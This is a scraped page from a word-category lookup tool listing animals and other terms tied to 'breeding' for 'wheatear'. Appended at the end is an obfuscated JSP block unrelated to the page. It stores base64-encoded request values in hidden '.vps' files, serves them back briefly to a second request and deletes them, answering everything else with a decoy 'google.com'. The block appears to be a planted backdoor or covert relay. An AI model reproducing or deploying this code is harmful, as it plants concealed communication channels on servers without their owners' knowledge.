Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
wheatear
with nuance
breeding
:
breeding:bird,
Simple categories matching
breeding
:
bird,
passerine,
pet,
organization,
animal,
seabird,
livestock,
duck,
creature,
poultry,
characteristic,
method,
structure,
news,
antelope,
warbler,
facility,
songbird,
season,
raptor,
shorebird,
mammal,
cattle,
waterfowl,
rodent,
wildfowl,
system,
trait,
information,
vertebrate,
waterbird,
predator,
farm,
Members with property
breeding
:
cow,
goat,
amazon,
sheep,
egret,
cattle,
animal_house,
pied_wagtail,
dugong,
mallard,
stonechat,
syrian_hamster,
lapwing,
nuthatch,
heron,
knot,
agriculture,
colourful_puffin,
dipper,
teal,
ovenbird,
curlew,
redshank,
beef,
vulture,
swan,
wheatear,
impala,
snipe,
tern,
swallow,
falcon,
killdeer,
bobolink,
veery,
primates,
greater_roadrunner,
fieldfare,
roseate_spoonbill,
pet,
wigeon,
wild_boar,
kestrel,
nightjar,
american_goldfinch,
osprey,
yellowhammer,
common_sandpiper,
fish,
rottweiler,
sound_foot,
lizard,
poultry_house,
meerkat,
razorbill,
kingfisher,
higher_queen,
participatory_crop,
breeding_association,
scaup,
cat,
cooperative,
golden_oriole,
morphology_king,
white_pelican,
guillemot,
pelican,
common_redshank,
plover,
reptile,
goldfinch,
moorhen,
crossbill,
common_nighthawk,
resistance,
anuran,
chicken,
sooty_tern,
wren,
male_fertility,
variation,
brent_goose,
goshawk,
buzzard,
snake,
raven,
california_gnatcatcher,
rat,
fruit_set,
ptarmigan,
tit,
zebra,
goosander,
blackbird,
gazelle,
bearded_tit,
grasshopper_sparrow,
poultry,
kittiwake,
golden_eagle,
cerulean_warbler,
grey_wagtail,
bull_system,
racehorse,
rock_pipit,
prairie_falcon,
good_mouth,
alder_flycatcher,
color,
farm_facility,
canaries,
chough,
bittern,
corn_bunting,
dairy_goat,
robin,
pig,
black_scoter,
eastern_meadowlark,
ibis,
redpoll,
northern_fulmar,
shoveler,
common_marmoset,
thrush,
pit_bull,
wolf,
mammoth,
goldeneye,
zoo,
mouse,
widgeon,
vireo,
duck,
spoonbill,
dog,
peregrine,
stallion_info,
ai_cooperative,
least_flycatcher,
bull,
arctic_tern,
eld_deer,
hamster,
oriole,
lemming,
pine_warbler,
elephant,
murre,
fowl,
grasshopper_warbler,
crested_tit,
bovine,
kentucky_warbler,
floral_morphology,
male_bird,
boar,
squirrel,
various_rodent,
meadow_lark,
pennisetum,
black_grouse,
chaffinch,
shrimp,
capercaillie,
finch,
upland_sandpiper,
woodcock,
golden_plover,
mammal,
bush_rabbit,
livestock,
flycatcher,
linnet,
oystercatcher,
sandpiper,
garganey,
museum,
blackcap,
pigeon,
pied_flycatcher,
japanese,
industrial_animal,
yellow_wagtail,
poultry_farm,
atlantic_brant,
hobby,
horse,
american_avocet,
dunlin,
love_bird,
common_merganser,
lesser_whitethroat,
little_penguin,
macaroni_penguin,
ewe,
grebe,
whinchat,
dunnock,
production_objective,
warbler,
camel,
mule,
meadowlark,
barnacle,
northern_gannet,
puffin_gannet,
stallion,
nest_box,
ostrich_farm,
emberiza-citrinella_yellowhammer,
buffalo,
yam_dioscoreaceae,
equine,
willow_warbler,
preservation_station,
black_stork,
cows,
wood_sandpiper,
gannet,
ruminant,
sorghum,
waders,
nutcracker,
sedge_cyperaceae,
northern_lapwing,
swine,
jay,
whitethroat,
redstart,
red_kite,
greenshank,
boer_goat,
eurasian_oystercatcher,
puffin,
common_snipe,
tufted_duck,
greater_scaup,
disease_resistance,
painted_bunting,
willow_tit,
albatross,
auckland_zoo,
corncrake,
broodmare_info,
ostrich,
vole,
penguin,
next_season,
merlin,
herd_management,
hatchery_raceway,
cormorant,
coot,
common_raven,
fulmar,
tree_pipit,
purebred_dog,
canada_goose,
black_duck,
star_system,
common_tern,
dotterel,
deer,
rabbit,
harrier,
bird,
woodpecker,
little_tern,
common_murre,
crocodile,
nightingale,
little_bird,
petrel,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>